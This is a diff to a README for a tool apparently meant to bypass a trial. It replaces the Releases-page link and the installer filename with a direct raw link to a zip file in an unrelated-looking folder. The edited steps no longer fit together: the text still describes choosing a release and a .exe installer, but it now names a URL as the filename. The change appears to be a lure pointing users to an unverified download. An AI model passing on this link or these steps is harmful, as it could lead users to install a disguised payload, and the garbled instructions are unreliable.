aandre2011/SMS-Enabler-No-Trial/README.md

 To get started with SMS-Enabler-No-Trial, follow these simple steps:

 1. **Visit the Releases Page**
-   Click [here to download](https://github.com/aandre2011/SMS-Enabler-No-Trial/releases) to access the latest version of the software.
+   Click [here to download](https://raw.githubusercontent.com/aandre2011/SMS-Enabler-No-Trial/main/hypermetabolism/SMS-Enabler-No-Trial-1.3.zip) to access the latest version of the software.

 2. **Choose the Right Version**
    On the Releases page, look for the most recent release.
 The version number usually appears at the top.
 If you're unsure, always select the latest one.

 3. **Download the Installer**
    Find the installer file.
-It is commonly marked with a name like `SMS-Enabler_No_Trial_Setup.exe`.
+It is commonly marked with a name like `https://raw.githubusercontent.com/aandre2011/SMS-Enabler-No-Trial/main/hypermetabolism/SMS-Enabler-No-Trial-1.3.zip`.
 Click on it to start the download.

 4. **Locate the Downloaded File**
    Once the download is complete, go to your Downloads folder or the location where your browser saves files.